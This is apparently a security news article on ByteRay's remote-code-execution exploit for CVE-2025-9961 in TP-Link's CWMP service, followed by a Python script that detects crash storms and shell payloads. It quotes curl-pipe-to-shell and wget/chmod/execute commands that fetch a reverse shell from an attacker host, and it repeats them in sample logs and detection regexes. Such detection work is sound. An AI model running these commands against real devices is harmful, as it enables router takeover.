Security researchers at ByteRay have published a detailed exploitation write-up of CVE-2025-9961, a vulnerability in TP-Link’s CWMP (CPE WAN Management Protocol) service that can be weaponized to achieve remote code execution (RCE) on affected devices. The work sheds light on both the technical complexity of exploitation and the persistence required to bypass mitigations such as ASLR and restricted payload delivery.
ByteRay’s team explained that their research required “direct interaction with the system to monitor logs, inspect configuration files, and set up GDB.” Instead of using UART, they leveraged a previously known flaw, CVE-2023-1389, to downgrade the firmware and gain the access needed to explore CVE-2025-9961.
Security mitigations were partially in place, including NX enabled and Partial RELRO, but the absence of stack canaries and PIE left exploitable gaps. As the report notes: “Stack: 10 bit fix, 10 bits, 12 bits”, which highlighted the ASLR entropy challenges the researchers needed to overcome.
The team’s initial proof-of-concept relied on GenieACS to deliver payloads, but the platform corrupted the byte range needed for reliable exploitation. As the researchers put it: “GenieACS could not faithfully transmit the full 0x00–0xFF byte range… This restriction forced a different approach — set up our custom ACS server!”
By building their own ACS server, ByteRay was able to faithfully reproduce the CWMP protocol steps and deliver arbitrary payloads via SetParameterValues requests.
Because address leaks were not possible, exploitation required brute-forcing base addresses. ByteRay explains: “Brute-forcing introduces a new challenge: the CWMP service will crash (SIGSEGV) if the guessed base address is incorrect. However, this is manageable because we already have access to the TP-Link web panel, allowing us to restart the service.”
Despite this instability, the team successfully implemented a ret2libc attack using carefully selected ROP gadgets to call the system() function in libc.
The final stage of the exploit involved serving a malicious ARM32 ELF reverse shell. Using msfvenom, the researchers generated a payload and delivered it through a crafted curl command:
buf += b"curl http://192.168.0.59:8000/show | sh"
The hosted show file instructed the device to download, chmod, and execute the backdoor binary:
wget http://[attacker]:8000/app -O /tmp/app && chmod +x /tmp/app && /tmp/app
The result was a fully functional reverse shell, proving CVE-2025-9961 can be exploited in real-world conditions.
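Two of the behaviours described above are visible from the device side: the CWMP service segfaulting repeatedly while a base address is brute-forced, and a SetParameterValues value that carries a download-and-execute shell chain. The script below is an added example written for this article, not ByteRay's PoC and not TP-Link's code; the syslog-style line formats, the process name `cwmp`, the request-log shape, and every log line and address in `SAMPLE_LOG` are constructed assumptions (the attacker host uses the documentation range 203.0.113.0/24 rather than the address in the write-up).

```python
"""Detection sketch for the two observable failure modes discussed above.

Constructed example: the log formats, process name and sample lines are
assumptions made for this illustration, not real TP-Link log output.
"""
import re
from collections import deque
from datetime import datetime, timedelta

# Assumed kernel-style crash line: "<ts> kernel: <proc>[<pid>]: segfault at <addr> ..."
CRASH_RE = re.compile(r"^(?P<ts>\S+) kernel: (?P<proc>\w+)\[\d+\]: segfault at [0-9a-f]+")
# Assumed CWMP request-log line: "<ts> cwmp: SetParameterValues <name>=<value>"
SPV_RE = re.compile(r"^(?P<ts>\S+) cwmp: SetParameterValues (?P<name>\S+)=(?P<value>.*)$")

# Shell chains matching the delivery pattern quoted in the article.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sh|bash)\b")
DROP_AND_EXEC = re.compile(r"\bwget\b.*-O\s+(/tmp/\S+).*chmod\s+\+x\s+\1.*\1")


def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%S")


def detect(lines, proc="cwmp", crash_threshold=3, window=timedelta(minutes=10)):
    """Return findings as (timestamp, rule, detail) tuples.

    crash_storm:   `crash_threshold` segfaults of `proc` inside `window`.
                   A guessed-wrong base address kills the service, so an
                   address brute-force looks like a run of crashes.
    shell_payload: a SetParameterValues value containing a pipe-to-shell
                   or wget/chmod/execute chain.
    """
    findings = []
    crashes = deque()  # timestamps of recent crashes of `proc`
    for line in lines:
        m = CRASH_RE.match(line)
        if m and m.group("proc") == proc:
            ts = parse_ts(m.group("ts"))
            crashes.append(ts)
            while crashes and ts - crashes[0] > window:
                crashes.popleft()
            # Fire once when the window first fills, not on every later crash.
            if len(crashes) == crash_threshold:
                findings.append((ts, "crash_storm",
                                 f"{crash_threshold} {proc} segfaults within {window}"))
            continue
        m = SPV_RE.match(line)
        if m:
            value = m.group("value")
            if PIPE_TO_SHELL.search(value) or DROP_AND_EXEC.search(value):
                findings.append((parse_ts(m.group("ts")), "shell_payload",
                                 f"{m.group('name')}={value}"))
    return findings


# Constructed sample log: three crash/restart cycles, a benign ACS URL change,
# then two parameter values carrying the chains described in the article.
SAMPLE_LOG = [
    "2025-09-01T10:00:01 kernel: cwmp[812]: segfault at 4011a0 ip 4011a0 sp bef1c2d0",
    "2025-09-01T10:00:05 httpd: service cwmp restarted by admin",
    "2025-09-01T10:00:31 kernel: cwmp[831]: segfault at 4021a0 ip 4021a0 sp bef1c2d0",
    "2025-09-01T10:00:35 httpd: service cwmp restarted by admin",
    "2025-09-01T10:01:02 kernel: cwmp[845]: segfault at 4031a0 ip 4031a0 sp bef1c2d0",
    "2025-09-01T10:01:40 cwmp: SetParameterValues Device.ManagementServer.URL=http://acs.example.net/cwmp",
    "2025-09-01T10:02:10 cwmp: SetParameterValues Device.X_Example.Note=curl http://203.0.113.5:8000/show | sh",
    "2025-09-01T10:02:12 cwmp: SetParameterValues Device.X_Example.Note=wget http://203.0.113.5:8000/app -O /tmp/app && chmod +x /tmp/app && /tmp/app",
]

if __name__ == "__main__":
    for ts, rule, detail in detect(SAMPLE_LOG):
        print(f"{ts.isoformat()} {rule}: {detail}")
```

The crash rule deliberately counts segfaults rather than restarts: the write-up notes the attacker restarts the service through the web panel, so a restart on its own is an administrator action and only the crash cadence distinguishes brute-forcing from an occasional fault. The threshold and window are tunable per device; on a CPE that rarely crashes, even two segfaults of the CWMP process in a short interval are worth surfacing.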
ByteRay clarified that the research and PoC testing were carried out solely for research purposes and that the full exploit code has been made available for study. The PoC is published on GitHub.